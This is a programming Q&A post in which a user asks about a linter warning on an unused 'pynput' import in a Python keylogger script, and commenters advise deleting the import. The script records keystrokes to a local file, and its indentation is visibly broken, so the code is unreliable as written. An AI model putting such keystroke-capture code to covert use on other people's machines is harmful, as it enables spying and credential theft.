# How do I fix this pynput import error that I'm getting?

Tags: python, pynput

Having a problem with the 'pynput' import. Was working fine yesterday. Opened up Atom today and now I'm getting an error saying `"F401 - 'pynput' imported but not used"`. I've looked around google and stackoverflow but none of what I've found has ended up fixing my problem.

Here is my code:

```
# Python keylogger program
import pynput
from pynput.keyboard import Key, Listener

count = 0   # Keeps count of user keystrokes
keys = []   # Place to store key strokes


# Records user keystrokes
def on_press(key):
    global keys, count

    keys.append(key)
        count += 1
        print("{0} pressed".format(key))

    if count >= 5:
        count = 0
        write_file(keys)
        keys = []


# Writes program to file
def write_file(keys):
    with open("keyLOg.txt", "a") as f:
        for key in keys:
            k = str(key).replace("'", "")
        if k.find("space") > 0:
            f.write('\n')
        elif k.find("Key") == -1:
            f.write(k)


# Ends program when user presses escape
def on_release(key):
    if key == Key.esc:
        return False

# Collects events until released
with Listener(on_press=on_press, on_release=on_release) as listener:
    listener.join()
```

Comment: remove `import pynput`

Comment: The error basically tells you what the problem is: You are never using pynput. Delete the line and things should work fine.